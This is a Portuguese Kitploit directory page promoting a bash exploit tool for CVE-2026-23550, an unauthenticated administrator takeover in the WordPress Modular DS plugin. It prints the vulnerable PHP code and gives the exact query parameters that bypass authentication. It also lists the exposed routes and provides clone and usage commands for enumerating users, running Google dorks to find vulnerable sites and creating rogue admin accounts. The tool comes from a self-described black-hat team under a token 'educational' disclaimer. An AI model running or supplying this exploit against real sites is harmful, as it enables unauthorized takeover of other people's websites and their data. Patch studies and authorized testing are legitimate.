Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-23550 — Script Bash para enumeração de utilizadores WordPress e criação automatizada de contas de administrador, explorando o CVE-2026-23550 para contornar a autenticação e obter tomada de controlo de administrador sem autenticação. | Kitploit
Ferramentas/GitHubGitHub/dedsecteam-blackhat/cve-2026-23550
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubdedsecteam-blackhat/cve-2026-23550

CVE-2026-23550

Script Bash para enumeração de utilizadores WordPress e criação automatizada de contas de administrador, explorando o CVE-2026-23550 para contornar a autenticação e obter tomada de controlo de administrador sem autenticação.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
1há 6 mesesAinda não revisado
Compartilhar

CVE-2026-23550

Modular DS <=2.5.1 - Assunção de Administrador Não Autenticada

ID CVE: CVE-2026-23550 Pontuação CVSS: 10.0 (CRÍTICA) Plugin Afetado: Plugin WordPress Modular DS Versões Afetadas: Todas as versões até 2.5.1 inclusive Versão Corrigida: 2.5.2 (lançada em 14 de janeiro de 2026) Exploração Ativa: Confirmada na natureza desde 13 de janeiro de 2026

Este plugin expõe suas rotas de API sob o prefixo /api/modular-connector/. Essas rotas são agrupadas atrás de middleware de autenticação em RouteServiceProvider.php. No entanto, a autenticação pode ser contornada usando o método defeituoso isDirectRequest().

Código vulnerável de HttpUtils.php:

root@kitploit:~
public static function isDirectRequest(): bool
{
    $request = \Modular\ConnectorDependencies\app('request');
    $userAgent = $request->header('User-Agent');
    $userAgentMatches = $userAgent && Str::is('ModularConnector/* (Linux)', $userAgent);
    $originQuery = $request->has('origin') && $request->get('origin') === 'mo';
    $isFromQuery = ($originQuery || $userAgentMatches) && $request->has('type');
    
    // When is wp-load.php request
    if ($isFromQuery) {
        return \true;
    }
    
    return \false;
}

A forma de contornar é muito simples: basta incluir os parâmetros origin=mo&type=anything na solicitação. Não há verificação de assinatura, segredo, IP ou User-Agent obrigatório – esses parâmetros por si só já são suficientes para que a solicitação seja considerada uma Modular direct request

Depois que a solicitação é considerada "direta", o middleware de autenticação em ModularGuard.php apenas verifica se o site está conectado ao Modular por meio de validateOrRenewAccessToken(). Não há vínculo criptográfico entre a solicitação recebida e o próprio Modular.

Rotas Expostas Com a autenticação contornada com sucesso, o atacante pode acessar:

root@kitploit:~
/login/{modular_request} – login remoto (acesso de administrador)

/server-information – dados sensíveis do sistema

/users/{modular_request} – enumeração de usuários

/backup/* – backups do site

/cache/clear – limpar cache

/manager/* – funções de gerenciamento

/woocommerce/{modular_request} – estatísticas do WooCommerce

Rota de Login Mais Crítica

root@kitploit:~
public function getLogin(SiteRequest $modularRequest)
{
    $user = data_get($modularRequest->body, 'id');

    if (!empty($user)) {
        $user = get_user_by('id', $user);
    }

    if (empty($user)) {
        Cache::driver('wordpress')->forget('user.login');
        $user = ServerSetup::getAdminUser();  // FALLBACK KE ADMIN MANAPUN
    } else {
        Cache::driver('wordpress')->forever('user.login', $user->ID);
    }

    if (empty($user)) {
        throw new \Exception('No admin user detected.');
    }

    $cookies = ServerSetup::loginAs($user, true);  // AUTO-LOGIN

    return Response::redirectTo(admin_url('index.php'))
        ->withCookies($cookies);
}

Se não houver ID de usuário no corpo da solicitação, o código procurará qualquer administrador existente (getAdminUser()) e fará login diretamente.

Autor: (Dedsec Team)
Descrição: Um poderoso script bash para enumeração de usuários WordPress e criação automatizada de contas de administrador. Criado apenas para fins educacionais e testes de segurança autorizados.

🚀 Recursos

  • Enumeração de Usuários – Descobre nomes de usuário WordPress percorrendo IDs de autores (/?author=1, /?author=2, etc.)
  • Exibição de Google Dorks – Mostra dorks úteis do Google para encontrar sites WordPress vulneráveis (opcional)
  • Modo Exploração – Tenta criar um novo usuário administrativo no alvo (requer um plugin/tema vulnerável ou CVE específico)
  • Saída Limpa – Feedback de console com código de cores para leitura fácil

📦 Requisitos

  • Bash 4+
  • curl (para solicitações HTTP)
  • base64 (se você estiver usando a versão ofuscada, hehe)

🔧 Instalação

root@kitploit:~
git clone https://github.com/DedsecTeam-BlackHat/CVE-2026-23550.git
cd CVE-2026-23550
chmod +x CVE-2026-23550.sh

Uso

root@kitploit:~
./CVE-2026-23550.sh [opções] <url_alvo>
  1. Enumerar usuários em um alvo ./CVE-2026-23550.sh -e -t http://targetsite.com
  2. Enumerar e depois criar um usuário administrador ./CVE-2026-23550.sh -t http://targetsite.com -c -u dedsec_admin -p P@ssw0rd!
  3. Apenas mostrar Google dorks ./CVE-2026-23550.sh -d
Baixar ferramenta